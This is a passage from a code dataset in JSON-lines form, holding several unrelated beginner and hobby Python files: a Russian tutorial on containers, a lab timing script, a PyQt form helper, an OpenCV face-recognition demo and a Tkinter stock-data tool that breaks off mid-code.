+ colors_matrica)\n\nprint(\"В списке 'colors_matrica'\".replace(\"'\", '\"'), len(colors_matrica), \"элементов\")\n\n# Пример использования списка на практике в 
файле \"Списки.py\"\n\n#=================================================================================================================================\nprint(\"Кортежи\".upper())\n# Кортежи\n# Два варианта создания кортежа:\nmy_tuple = tuple()\nprint(my_tuple)\n\nmy_tuple = ()\nprint(my_tuple)\n\n# Добавление объектов в кортеж через второй способ\n\nrndmeme = (\"оооо либераху порвало\", \"Я: \", False)\nprint(rndmeme)\n# Даже при одном элементе нужно после него ставить запятую\nnumber = (27,)\nprint(number)\n\n# При попытке добавить или изменить содержимое картежа сгенерируется исключение\n# Получение осуществляется так же, как и в списках:\ndys = (\"1984\", \"О дивный новый мир\", \"451 градус по Фаренгейту\")\nprint(dys[0])\n# Проверка содержимого в кортеже\nprint(\"О дивный новый мир\" in dys)\nprint(\"Мы\" not in dys)\n# Кортежи удобны при работе со значениями, которые никода не меняются. Они могут гарантировать,\n# что другие части программы их не изменят.\n\n#=================================================================================================================================\n\nprint(\"Словари\".upper())\n# Словари\n# Два варианта создания словарей:\nmy_dict = dict()\nprint(my_dict)\n\nmy_dict = {}\nprint(my_dict)\n\n# Добавление пары ключ-значение при создании словарей:\nfruits = {\"Яблоко\":\n \"красное\"}\nfruits = {\"Яблоко\":\n \"красное\",\n \"Банан\":\n \"жёлтый\"}\nprint(fruits)\n\n\n# Пример изменения словаря:\n\nfacts = dict()\n\n# Добавление значения\nfacts[\"код\"] = \"смешной\"\n# Поиск значения при помощи ключа\nprint(facts[\"код\"])\n\nfacts[\"Билл\"] = \"Гейтс\"\nprint(facts[\"Билл\"])\n\nfacts[\"основание\"] = 1776\nprint(facts[\"основание\"])\n\n# Значением в словаре может быть любой объект. Ключ словаря должен быть неизменяем - может быть или строкой, или кортежем.\n# Слово in нельзя использовать для проверки наличия в словаре значеия.\n\nbill = dict({\"Билл Гейтс\":\n \"щедрый\"})\nprint(\"Билл Гейтс\" in bill)\n\n# Если попытаться получить доступ к словарю, отсутствующему в словаре, Python сгенерирует исключение.\nprint(\"Билл Дорз\" not in bill)\n\n# Удаление их списка пары ключ-значение:\nbooks = {\"Дракула\": \"Стокер\",\n \"1984\": \"Оруэлл\",\n \"Процесс\": \"Кафка\"}\nprint(books)\ndel books[\"Процесс\"]\nprint(books)\n\n# Пример программы, использующей словарь\nrhymes = {\"1\": \"смех\",\n \"2\": \"синий\",\n \"3\": \"я\",\n \"4\": \"этаж\",\n \"5\": \"жизнь\"}\n\nn = 3\nif n in rhymes:\n print(rhymes[n])\nelse:\n print(\"Не найдено.\")\n \nprint(rhymes)\n\n#=================================================================================================================================\n# Контейнеры внутри контейнеров\nprint(\"Контейнеры внутри контейнеров\".upper())\n\nlists = []\nrap = [\"Баста\", \"Кравц\", \"Злой дух\",]\nrock = [\"Наутилус Помпилиус\", \"Кино\", \"Ария\"]\ndjs = [\"Paul Oakenfold\", \"Tiesto\"]\n\nlists.append(rap)\nlists.append(rock)\nlists.append(djs)\n\nprint(lists)\n# Получение доступа к списком через индекс\nprint(lists[2])\n\nlists[2].append(\"Srillax\")\nprint(lists[2])\n# Или через названия подсписков\nrap.append(\"Оксимирон\")\n\nprint(lists[0][3]) # Вывод: Оксимирон. 
1 индекс - список rap.\n # 2 индекс - элемент \"Оксимирон\"\n\n# Кортежи внутри списка:\nlocations = []\n\ntula = (54.1960, 37.6182)\nmoscow = (55.7522, 37.6155)\n\nlocations.append(tula)\nlocations.append(moscow)\n\nprint(locations)\n\n\n# Списки внутри кортежа\n\neights = [\"Эдгард Алан По\",\n \"Чарльз Диккенс\"]\nnines = [\"Хемингуэй\",\n \"Фицджеральд\",\n \"Оруэлл\"]\n\nauthors = (eights, nines)\nprint(authors)\neights.append(\"Ноу Нейм\")\nprint(authors)\n# P.S. списки изменять можно, кортеж нет\n\nbday = {\"Хемингуэй\": \"21.07.1899\",\n \"Фицджерпльд\": \"24.09.1896\"}\n# Словарь внутри списка\nmy_list = [bday]\nprint(my_list)\n# Словарь внутри кортежа\nmy_tuple = (bday,)\nprint(my_tuple)\n\n# Список, кортеж или словарь могут быть значеними в словаре.\nru = {\"рсположение\": (55.7522, 37.6155),\n \"знаменитости\": [\"Андрей Звягинцев\",\n \"Юрий Дудь\",\n \"Владимир Путин\"],\n \"факты\": {\"столица\": \"Москва\",\n \"страна\": \"Россия\"}\n}\n\nprint(ru)\n\n\n#=================================================================================================================================\n\n# Множества.\nprint('Множество'.upper())\n\n# Множества - это структура данных, которая содержит неупорядочные неиндексированные эле��енты.\n# Множества позволяет внесение и удаление элементов.\n# Существет ряд особенностей, которые определяют множество от других структур данных:\n# множества не содеражат дубликаты элементов;\n# элементы множества являются неименяемыми,однако само по себе множетсов является изменяемым, и его можно менять;\n# Так как элементы не индексируются, множества не поддерживают никаких операций среза и индексирования.\n\n# Создание множества.\nprint(\"Создание множеств\".upper())\n\n# Множество может содеражать любое количество элементов и элементы могут быть разных типов,\n# к примеру, целые числа, строки, кортежи и т.д.\n# Однако, множество не поддерживает изменяемые элементы, такие как списки, словари, и так далее.\n# Существует два способа создания множества:\n\n# Можно создать множества путём передачи всех элементов множества внутри фигурных скобок {} и разделить элементы при помощи (,)\nnum_set = {1, 2, 3, 4, 5, 6}\nprint(num_set)\n\nstring_set = {\"Nicholas\", \"Michelle\", \"John\", \"Mercy\"}\nprint(string_set)\n\n# Элементы выдачи могут находится в произвольном порядке.\nmixed_set = {2.0, \"Nicholas\", (1, 2, 3)}\nprint(mixed_set)\n\n\n\n# Можно создать множество из списков.\nnum_set = set([1, 2, 3, 4, 5, 6])\nprint(num_set)\n\n\n# Множество не содержит дубликато элементов:\nnum_set = set([1, 2, 3, 1, 2])\nprint(num_set)\n# Множество удалило дубликаты 1 и 2\n# Это также происходит при создании множества с нуля:\nnum_set = {1, 2, 3, 1, 2}\nprint(num_set)\n\n\n# Создание пустого множества подразумевает определённую хитрость\n# Если использовать пустые фигурные скобки, то создастся пустой словарь, а не множество. 
Например:\nx = {}\nprint(type(x))\n# Чтобы создать пустое множество, нужно использовать фунцию set()\nx = set()\nprint(type(x))\n\n\n\n\n# Проверка наличия эелемента во множестве при помощи in\nmonths = set([\"Jan\", \"Feb\", \"March\", \"Apr\", \"May\", \"June\", \"Jule\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"])\nprint(\"May\" in months)\nprint(\"John\" not in months)\n\n\n\n# Добавление элементов во множество при помощи фунции add().\nmonths = set([\"Jan\", \"March\", \"Apr\", \"May\", \"June\", \"Jule\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"])\nprint(months)\n\nmonths.add(\"Feb\")\nprint(months)\n\n\nnum_set = {1, 2, 3}\nnum_set.add(4)\nprint(num_set)\n# При добавлении изменяемых элементов во множество (списков, словарей и т.д.) выйдет исключение TypeError.\n\n\n# Удаление элемента из множеств\n# Элементы могут быть удалены при помощи методов discard() и remove()\n\nnum_set = {1, 2, 3, 4, 5, 6} \nnum_set.discard(3) \nprint(num_set)\n\nnum_set = {1, 2, 3, 4, 5, 6} \nnum_set.remove(3) \nprint(num_set)\n\n# Метод discard() не будет выдавать ошибку, если элемент не найден в отличии от remove()\n\nnum_set = {1, 2, 3, 4, 5, 6} \nnum_set.discard(7) \nprint(num_set)\n\ntry:\n num_set = {1, 2, 3, 4, 5, 6} \n num_set.remove(7) \n print(num_set)\nexcept KeyError:\n print(\"Ошибка: этого элемента нет во множестве.\")\n\n# С методом pop(), можно удалить и вернуть элемент.\n# Так как элементы находятся в произвольном порядке, нельзя утверждать или предсказать, какой элемент будет удален.\n# Пример:\nnum_set = {1, 2, 3, 4, 5, 6}\nprint(num_set.pop())\n\n# Можно использовать этот метод при удалении элемента и возврате элементов, которые остаются во множестве. Например:\n\nnum_set = {1, 2, 3, 4, 5, 6} \nnum_set.pop() \nprint(num_set)\n\n# Метод clear() поможет удалить все элементы во множестве. Например:\n\nnum_set = {1, 2, 3, 4, 5, 6} \nnum_set.clear()\n\nprint(num_set)\n\n\n# Объединение множеств.\n# Операция объединения двух или более множеств union().\n# Пример:\n\nmonths_a = set([\"Jan\", \"Feb\", \"March\", \"Apr\", \"May\", \"June\"]) \nmonths_b = set([\"July\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"])\n\nall_months = months_a.union(months_b) \nprint(all_months)\n\n#\n\nx = {1, 2, 3} \ny = {4, 5, 6} \nz = {7, 8, 9}\n\noutput = x.union(y, z)\n\nprint(output)\n\n# При выполнении операции объединения, дубликаты игнорируются, так что только один из двух элементов дубликатов будет отображаться.\n\nx = {1, 2, 3} \ny = {4, 3, 6} \nz = {7, 4, 9}\n\noutput = x.union(y, z)\n\nprint(output)\n\n# Оператор | может также использоваться при поиске объединения двух или более множеств. Например:\n\nmonths_a = set([\"Jan\", \"Feb\", \"March\", \"Apr\", \"May\", \"Jun\"])\nmonths_b = set([\"July\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"])\n\nprint(months_a | months_b)\n\n#\n\nx = {1, 2, 3} \ny = {4, 3, 6} \nz = {7, 4, 9}\n\nprint(x | y | z)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Уроки/Часть I. Введение в програмирование/Глава 5. Контейнеры.py","file_name":"Глава 5. 
Контейнеры.py","file_ext":"py","file_size_in_byte":13630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"365210397","text":"from stipy import *\n \nns = 1.0\nus = 1000.0\nms = 1000000.0\ns = 1000000000.0\n\n# Set description used by program\nsetvar('desc','''Turn TAs On.''')\n\ninclude(\"channels.py\")\ninclude(\"experimentalParameters.py\")\n\n# Define different blocks of the experiment\ndef turnTAsOn(Start):\n \n\n #Initialization Settings\n tStart =1*ms\n\n ## TA Settings ##\n tTAOn = tStart + 10*ms\n\n\n event(TA1, tTAOn, voltageTA1) # TA 1 on\n event(TA2, tTAOn + 1*ms, voltageTA2) # TA 2 on \n event(TA3, tTAOn + 2*ms, voltageTA3) # TA 3 on\n event(TA4, tTAOn + 3*ms, ta4MotVoltage) # TA 4 on\n# event(TA5, tTAOn + 4*ms, 0) # TA 5 off\n# event(TA6, tTAOn + 5*ms, 0) # TA 6 off\n event(TA7, tTAOn + 2.5*ms, ta7MotVoltage) # TA 7 on\n\n return Start\n\n\n# Global definitions\n\nt0 = 10*us\n\ntime = t0\ntime = turnTAsOn(time)\n","sub_path":"timing/turnTAsOn.py","file_name":"turnTAsOn.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"379099531","text":"# makeInform.py\r\nimport sys\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QtCore import *\r\n\r\n\r\nclass MakeInform():\r\n def __init__(self):\r\n query = {}\r\n\r\n def makeQuery(self, widgetLst, req):\r\n # print(\"들어옴\")\r\n self.query = {}\r\n if req==1: # alarm\r\n time = widgetLst[0].dateTime()\r\n self.query[\"time\"] = time.toString(Qt.DefaultLocaleShortDate)\r\n inform = widgetLst[1].toPlainText()\r\n self.query[\"inform\"] = inform\r\n # print(self.query)\r\n\r\n elif req==2: # symptom\r\n time = widgetLst[6].dateTime()\r\n self.query[\"time\"] = time.toString(Qt.DefaultLocaleShortDate)\r\n symptom = widgetLst[0].toPlainText()\r\n self.query[\"symptom\"] = symptom\r\n level = 0\r\n if widgetLst[1].isChecked():\r\n level = 1\r\n elif widgetLst[2].isChecked():\r\n level = 2\r\n elif widgetLst[3].isChecked():\r\n level = 3\r\n elif widgetLst[4].isChecked():\r\n level = 4\r\n elif widgetLst[5].isChecked():\r\n level = 5\r\n self.query[\"level\"] = level\r\n\r\n if req==3: # action\r\n time = widgetLst[0].dateTime()\r\n self.query[\"time\"] = time.toString(Qt.DefaultLocaleShortDate)\r\n action = widgetLst[1].toPlainText()\r\n self.query[\"action\"] = action\r\n\r\n # print(\"makeQuery끝\")\r\n return self.query\r\n","sub_path":"makeInform.py","file_name":"makeInform.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"608103886","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 9 16:05:54 2016\n\n@author: eduardo.oest.moreira\n\"\"\"\n\nfrom tkinter import *\nclass popup:\n def __init__(self,toplevel):\n self.fr1 = Frame(toplevel)\n self.fr1.pack()\nimport tkinter as tk\nimport cv2\nimport csv\nfrom PIL import Image, ImageTk\nimport numpy as np\nfrom tinyfacerec.util import read_images, asRowMatrix\nfrom tinyfacerec.model_Eduardo import FisherfacesModel, 
EigenfacesModel\n\nhaarscade_path=(r'C:\\Users\\eduardo.oest.moreira\\AppData\\Local\\Continuum\\Anaconda3\\haarcascades\\haarcascade_frontalface_default.xml')\nimages_path=(r'C:\\Users\\eduardo.oest.moreira\\Pictures\\Fotos')\nimages2_path=(r'C:\\Users\\eduardo.oest.moreira\\Pictures\\Fotos2\\user.jpg')\nimages3_path=(r'C:\\Users\\eduardo.oest.moreira\\Pictures\\Fotos2\\user_1.jpg')\ndatos_csv=(r'C:\\Users\\eduardo.oest.moreira\\Documents\\Davivienda\\Book1.csv')\nfaceCascade = cv2.CascadeClassifier(haarscade_path)\nvideo_capture = cv2.VideoCapture(0)\n[X , y] = read_images (images_path)\nmodel = FisherfacesModel(X[0:], y[0:])\nmodel2 = EigenfacesModel(X[0:], y[0:])\nc = 0\nroot = tk.Tk()\nroot.bind('', lambda e: root.quit())\nlmain = tk.Label(root)\nlmain.pack(side=LEFT)\npassword=tk.Entry(root, bd=5, show=\"*\")\npassword.config(font=('Arial', 8, 'bold', 'italic'))\npassword.pack()\nresponse=tk.Text(root, width=20, height=1)\nresponse.config(font=('Arial', 8, 'bold', 'italic'))\nresponse.pack()\nnombre=tk.Text(root, width=20, height=1)\nnombre.config(font=('Arial', 8, 'bold', 'italic'))\nnombre.pack()\nresume=tk.Text(root, width=35, height=20)\nresume.config(font=('Arial', 8, 'bold', 'italic'))\nresume.pack()\ndist=dict()\ndef reconocimiento_face():\n    mod='xxx'\n    abc=''\n    name='xxx'\n    resultado='false'\n    passw=''\n    perc=0\n    perc0=0\n    #Capture frame-by-frame\n    ret, frame = video_capture.read()\n\n    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n    \n    faces = faceCascade.detectMultiScale(\n        gray,\n        scaleFactor=1.3,\n        minNeighbors=5,\n        minSize=(30, 30),\n        #flags=cv2.CV_HAAR_SCALE_IMAGE\n        flags=cv2.CASCADE_SCALE_IMAGE\n    )\n    #help(cv2)\n    # Draw a rectangle around the faces\n    c=0\n    for (x, y, w, h) in faces:\n        c = 0\n        if c < 1:\n            cv2.imwrite(images2_path, gray, [cv2.IMWRITE_JPEG_QUALITY, 90])\n            im = Image.open(images2_path)\n            crop_im = im.crop((x,y,x+w,y+h))\n            crop_im = crop_im.resize((300,300), Image.ANTIALIAS)\n            crop_im.save(images3_path)\n            c = c+1\n        cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n    try:\n        #basewidth = 112\n        image = Image.open(images3_path)\n        image = image.convert(\"L\")\n        xx = np.asarray(image, dtype=np.uint8)\n    except IOError as e: \n        print (\"I/O error({0}): {1}\".format(e.errno, e.strerror))\n    except Exception as e:\n        print (\"Unexpected error:\", e)\n        raise \n    mod = model.predict(xx)\n    dist=model.dist_faces(xx)\n    # Number of faces\n    # Display the resulting frame\n    frame2 = cv2.flip(frame, 1)\n    cv2image = cv2.cvtColor(frame2, cv2.COLOR_BGR2RGBA)\n    if c>0:\n        #minimo=dist[min(dist, key=dist.get)]\n        minimo=0\n        maximo=dist[max(dist, key=dist.get)]\n        den=maximo-minimo\n        for k,v in dist.items():\n            perc0=round(1-((v-minimo)/den),2)\n            abc= abc + k + ': ' +str(perc0) +'\\n'\n            if perc0>perc:\n                perc=perc0\n                name=k\n        cv2.putText(cv2image, name,\n            org = (300,400), \n            fontFace = cv2.FONT_HERSHEY_DUPLEX, \n            fontScale = 2, \n            color = (0,0,255),\n            thickness = 2,\n            lineType = cv2.LINE_AA\n            ) \n        input1=nombre.get('1.0',END)\n        if input1!=mod:\n            nombre.delete('1.0',END)\n            resume.delete('1.0',END)\n            response.delete('1.0',END)\n            nombre.insert(INSERT, mod)\n            resume.insert(INSERT, (abc+'\\n'))\n            with open(datos_csv) as csvfile2:\n                readCSV2 = csv.reader(csvfile2, delimiter=',')\n                for client in readCSV2:\n                    client_name=client[0]\n                    if name==client_name:\n                        passw=password.get()\n                        if passw==client[1]:\n                            resultado='true'\n                        else:\n                            resultado='false'\n                        response.insert(INSERT, resultado)\n    \n    if mod=='xxx': \n        nombre.delete('1.0',END)\n        resume.delete('1.0',END)\n        response.delete('1.0',END)\n    img = 
Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(image=img)\n lmain.imgtk = imgtk\n lmain.configure(image=imgtk)\n lmain.after(10, reconocimiento_face)\n return mod\nreconocimiento_face()\npopup(root)\nroot.mainloop()\nvideo_capture.release()\ncv2.destroyAllWindows()","sub_path":"src/main/resources/Reconhecimento.py","file_name":"Reconhecimento.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"557081775","text":"'''\n2.6\nImplementar un programa que lea un número real y muestre si elnúmero es positivo\n'''\n\n# Lectura de la informacio\na = int(input(\"Escriu un enter i et diré si es positiu \"))\n\n# Mostram resultats\nif a > 0: # si el valor que guardam dins la variable a es estrictament major a 0\n print(\"El nombre es positiu\")\nelse: # sino\n print(\"No ho es\")","sub_path":"Exercicis/Tema2/2_6.py","file_name":"2_6.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"375131146","text":"\"\"\" Import GUI \"\"\"\r\nfrom tkinter import *\r\nfrom tkinter import filedialog \r\n\r\n\"\"\" Import for Traceback errors \"\"\"\r\nimport sys\r\nimport traceback \r\n\r\n\"\"\" import os to run excel \"\"\"\r\nimport os \r\nimport subprocess \r\n\"\"\" import time tracker \"\"\"\r\nimport timeit\r\n\r\n\"\"\" Import urllib and csv for Fidelity Daily Report prices \"\"\"\r\nimport urllib.request\r\nimport csv \r\nimport codecs \r\n\"\"\" import date and create now variable\"\"\"\r\nimport datetime\r\nnow = datetime.datetime.now()\r\n\r\n\"\"\" Import Pandas Library \"\"\"\r\nimport pandas as pd\r\nimport pandas.io.data \r\nfrom pandas import Series, DataFrame\r\nfrom pandas import ExcelWriter \r\nfrom pandas import read_csv \r\n\r\n\"\"\"Import Matplot Library \"\"\"\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib as mpl\r\nmpl.rc('figure', figsize=(8,7))\r\n\r\n\r\n\"\"\" Onclick Function to close windows from 'Submit' Buttons \"\"\"\r\n\r\ndef onclick():\r\n\tglobal file \r\n\tglobal file_list \r\n\tfile = None \r\n\tfile_list = None \r\n\troot.destroy() \r\ndef onclick2():\r\n\troot2.destroy()\r\ndef onclick3():\r\n\troot3.destroy() \r\ndef onclick4():\r\n\troot4.destroy() \r\ndef onclick5():\r\n\tglobal text_lines\r\n\tglobal text_lines_two\r\n\tglobal text_lines_one \r\n\t\r\n\ttext_lines_start = Multiple_List_Variable.get(\"1.0\",'end').splitlines()\r\n\ttext_lines_one = [i.split(',') for i in text_lines_start]\r\n\ttext_lines_one = [[i.strip() for i in inner] for inner in text_lines_one]\r\n\ttext_line_two = [item for sublist in text_lines_one for item in sublist] \r\n\ttext_line_three = [words for segments in text_line_two for words in segments.split()]\r\n\tprint(text_lines_one) \r\n\tprint(text_line_two) \r\n\tprint(text_line_three)\r\n\tno_weird_characters = str.maketrans(\"\", \"\", \"+=,?!-_\")\r\n\ttext_lines = [s.translate(no_weird_characters) for s in text_line_three]\r\n\ttext_lines = list(filter(None, text_lines))\r\n\ttext_lines = [i.strip() for i in text_lines]\r\n\troot5.destroy()\r\n\tprint(text_lines) \r\n\treturn text_lines \t\r\ndef onclick6():\r\n\tglobal manual_file_entry\r\n\tmanual_file_entry = 1 \r\n\troot6.destroy() \r\n\r\n\"\"\" Button functions for browsing files \"\"\" \r\ndef file_onclick():\r\n\tglobal file \r\n\tglobal file_list \r\n\tfile = filedialog.askopenfile(parent=root2, mode='r', title = 'Choose a file')\r\n\tif file != None:\r\n\t\twith file as 
infile:\r\n\t\t\tfile_list = [line.strip() for line in infile]\r\n\t\t\tfile.close()\r\n\t\troot2.destroy() \r\n\t\treturn file_list \r\n\t \r\n\treturn file \r\ndef file_onclick2():\r\n\tglobal new_file\r\n\tglobal manual_file_entry \r\n\tnew_file = filedialog.asksaveasfilename(parent = root6, title = 'Save New File', defaultextension = '.xlsx')\r\n\tmanual_file_entry = 0 \r\n\troot6.destroy() \r\n\r\n\"\"\" Start GUI \"\"\"\r\nroot = Tk()\r\nw = 400\r\nh = 200 \r\nws = root.winfo_screenwidth() \r\nhs = root.winfo_screenheight() \r\nx = (ws/2) - (w/2) \r\ny = (hs/2) - (h/2) \r\n\r\nw1 = 250 \r\nh1 = 25\r\nroot.title(\"File Upload\")\r\nroot.geometry('%dx%d+%d+%d' % (w1, h1, x, y))\r\n\r\napp = Frame(root)\r\napp.grid() \r\nlabel = Label(app, text = \"\") \r\n\r\nlabel.grid() \r\n\r\n\"\"\"Create list of Tickers\"\"\"\r\n# Text variables for the GUI\r\nAnswer_Control = StringVar() \r\nAnswer = StringVar() \r\n\r\n\"\"\" Ask for File \"\"\"\r\n\r\n# GUI 1: Ask whether there is a file to upload\t\r\nFile_or_Manual_Instructions = Label(text = \"Do you have a file to upload?\")\r\nFile_or_Manual_Instructions.grid(row = 0, column = 0, sticky = W)\r\nFile_or_Manual_Entry_Yes = Radiobutton(text = \" Yes \", variable = Answer_Control, value = 'Y', indicatoron = 0, command = onclick).grid(row = 0, column = 10, columnspan = 1, sticky = W)\r\nFile_or_Manual_Entry_No = Radiobutton(text = \" No \", variable = Answer_Control, value = 'N', indicatoron = 0, command = onclick).grid(row = 0, column = 15, columnspan = 1, sticky = E)\r\n\r\n \r\nroot.mainloop()\r\nFile_or_Manual = Answer_Control.get() \r\n \r\nprint(File_or_Manual) \r\n\r\n\r\n\r\n\r\n\r\n#GUI 2: Is this a single stock, list of stocks, or Daily Report?\r\n\r\nif File_or_Manual == \"N\":\r\n\t# Create new root \r\n\troot3 = Tk()\r\n\troot3.title('List Type')\r\n\tw3 = 220\r\n\th3 = 60\r\n\troot3.geometry('%dx%d+%d+%d' % (w3, h3, x, y))\r\n\tapp = Frame(root3)\r\n\tapp.grid()\r\n\tEntry_Type = StringVar() \r\n\tlabel3 = Label(app, text = 'Type of List')\r\n\tlabel3.grid() \r\n\tEntry_Type_Instructions = Label(text = \"Is this a single stock or list of stocks?\")\r\n\tEntry_Type_Instructions.grid(row = 0, column = 0, columnspan = 3, sticky = W)\r\n\tStock_Entry = Radiobutton(text = \"Single Stock \", variable = Entry_Type, value = 'S', indicatoron = 0, command = onclick3).grid(row = 1, column = 0, sticky = N+S+E+W) \r\n\tStock_Entry = Radiobutton(text = \" List \", variable = Entry_Type, value = 'L', indicatoron = 0, command = onclick3).grid(row = 1, column = 1, sticky = N+S+E+W)\r\n\troot3.mainloop() \r\n\tFile_Input = Entry_Type.get()\r\n\tManual = File_Input.upper() \r\nelse:\r\n\tManual = 0 \r\n\r\n#Create new root \r\n#root2 = Tk()\r\n#root2.title('Amount of Stocks')\r\n#root2.geometry('%dx%d+%d+%d' % (w, h, x, y))\r\n#app = Frame(root2)\r\n#app.grid()\r\n#label2 = Label(app, text = 'File Name')\r\n#label2.grid() \r\n\r\n# GUI 3: Get the name of the file if they have one.\r\n\r\nif File_or_Manual == \"Y\":\r\n\t# Create Root \r\n\troot2 = Tk()\r\n\troot2.title('Amount of Stocks')\r\n\troot2.geometry('%dx%d+%d+%d' % (w, h, x, y))\r\n\tapp = Frame(root2)\r\n\tapp.grid()\r\n\tlabel2 = Label(app, text = 'File Name')\r\n\tlabel2.grid() \r\n\tFile_Answer = StringVar() \r\n\t\r\n\t# Root buttons and inputs \r\n\tFile_Input_Instructions = Label(text = \"What is the name of the File: \")\r\n\tFile_Input_Instructions.grid(row = 4, column = 0, sticky = W)\r\n\tFile_Input_Entry = Entry(textvariable = File_Answer)\r\n\tFile_Input_Entry.grid(row = 4, 
column = 10, columnspan = 10, sticky = W)\r\n\tFile_Input_Entry.config(borderwidth = 5 , selectborderwidth = 5)\r\n\tSubmit_Button2 = Button(text = 'Submit', command = onclick2)\r\n\tSubmit_Button2.grid(row = 6, column = 10, sticky = E) \r\n\tSubmit_Button2.config(bd = 5)\r\n\tBrowse_Button = Button(text = \"Browse for File\", command = file_onclick) \r\n\tBrowse_Button.grid(row = 6, column = 11, sticky = W) \r\n\tBrowse_Button.config(bd = 5)\r\n\troot2.mainloop() \r\n\tFile_Input = File_Answer.get()\r\n\tFile = File_Input + '.csv'\r\n\tprint(File) \r\n\tif file != None:\r\n\t\tlist = file_list \r\n\telse:\r\n\t\twith open(File) as infile:\r\n\t\t\tlist = [line.strip() for line in infile]\t\r\n\r\n# GUI 4: Enter the ticker symbol if it's a single stock. \r\nelif Manual == \"S\" :\r\n\t# Create Root\r\n\troot2 = Tk()\r\n\troot2.title('Ticker Symbol')\r\n\tw2 = 270\r\n\th2 = 60 \r\n\troot2.geometry('%dx%d+%d+%d' % (w2, h2, x, y))\r\n\tapp = Frame(root2)\r\n\tapp.grid()\r\n\tFile_Answer = StringVar() \r\n\t\r\n\t# Root buttons and input \r\n\tStock_Input_Instructions = Label(text = \"Enter the Ticker Symbol:\")\r\n\tStock_Input_Instructions.grid(row = 4, column = 1, sticky = W)\r\n\tStock_Input_Entry = Entry(textvariable = File_Answer)\r\n\tStock_Input_Entry.grid(row = 4, column = 2, sticky = E)\r\n\tSubmit_Button2 = Button(text = 'Submit', command = onclick2)\r\n\tSubmit_Button2.grid(row = 6, column = 1, columnspan = 2, sticky = N+S+E+W)\r\n\tSubmit_Button2.config(bd = 5)\r\n\troot2.mainloop() \r\n\tlist = File_Answer.get() \r\n\r\nelif Manual == \"L\" : \r\n\tList_Ticker = []\r\n\troot5 = Tk()\r\n\troot5.title('Tickers')\r\n\tw5 = 100\r\n\th5 = 250\r\n\troot5.geometry('%dx%d+%d+%d' % (w5, h5, x, y))\r\n\tapp = Frame(root5)\r\n\tapp.grid()\r\n\tMultiple_List = StringVar() \r\n\t\r\n\tStock_Ticker_Instructions = Label(text = \"List Each Ticker:\")\r\n\tStock_Ticker_Instructions.grid(row = 0, column = 0, columnspan = 2)\r\n\tMultiple_List_Variable = Text(width = 10, height = 10, wrap = WORD )\r\n\tMultiple_List_Variable.grid(row = 2, column = 1) \r\n\tSubmit_Button_List = Button(text = \"Submit\", command = onclick5)\r\n\tSubmit_Button_List.grid(row = 3, column = 1, sticky = N+S+E+W)\r\n\tSubmit_Button_List.config(bd = 5)\r\n\troot5.mainloop() \r\n\tlist = text_lines \r\n\t\r\n# The automatic file import if it is the daily report. 
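A note on the price download this script performs below: pandas.io.data (used as pd.io.data.get_data_yahoo) was removed from pandas and now lives in the separate pandas-datareader package, and resample(..., how='mean') was replaced by method chaining. A sketch of the modern equivalents, assuming pandas-datareader is installed and its Yahoo endpoint is reachable (it has broken in the past when Yahoo changed its API); tickers and dates are illustrative:

    import datetime
    import pandas_datareader.data as web

    start = datetime.datetime(2014, 1, 1)
    end = datetime.datetime(2017, 1, 1)

    prices = web.DataReader(['AAPL', 'MSFT'], 'yahoo', start, end)['Adj Close']
    rets = prices.pct_change()               # period-over-period returns
    monthly = prices.resample('MS').mean()   # replaces resample('MS', how='mean')
    corr = rets.corr()                       # pairwise correlation of returns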
\r\nelif Manual == \"D\" : \r\n\twith open('DailyReportIndex.csv') as infile:\r\n\t\tlist = [line.strip() for line in infile] \r\n\r\nelse:\r\n\tprint(\"An incorrect key was entered\")\r\n\r\n\r\n\r\n\"\"\" Start Timer \"\"\"\r\ntic = timeit.default_timer()\r\n\r\n\"\"\" Time and Data Intervals \"\"\"\r\n \r\n\r\n\r\n# Time and Data Interval for the Daily Report \r\nif Manual == \"D\":\r\n\tdata_interval = \"d\"\r\n\tYears_of_Data = 0 \r\n\r\n\r\nelse:\r\n\t\r\n\t# GUI 5: Ask whether you would you would like the standard 36 months or a specific date\r\n\t# Create new root\r\n\troot3 = Tk()\r\n\troot3.title('Standard Data Set')\r\n\tw3 = 400\r\n\th3 = 50 \r\n\troot3.geometry('%dx%d+%d+%d' % (w3, h3, x, y))\r\n\tapp = Frame(root3)\r\n\tapp.grid()\r\n\tStandard_Monthly = StringVar()\r\n\tTime_Interval_Answer = IntVar()\r\n\tData_Interval_Answer = StringVar()\r\n\tRadio_Answer_36 = StringVar() \r\n\tTime_Input_Instructions = Label(text = \"Would you like the standard monthly data for 36 months?\")\r\n\tTime_Input_Instructions.grid(row = 2, column = 0, sticky = W)\r\n\tSubmit_Button_3 = Radiobutton(text = ' Yes ', variable = Radio_Answer_36, value = 'Y', indicatoron = 0, command = onclick3).grid(row = 2, column = 1)\r\n\tSubmit_Button_3 = Radiobutton(text = ' No ', variable = Radio_Answer_36, value = 'N', indicatoron = 0, command = onclick3).grid(row = 2, column = 2)\r\n\t\r\n\troot3.mainloop() \r\n\ttime_interval = Radio_Answer_36.get() \r\n\tif time_interval == \"Y\":\r\n\t\tYears_of_Data = 3\r\n\t\tdata_interval = \"m\"\r\n\telse:\r\n\t\t# Ask how many years of data needed\r\n\t\t# Ask for the 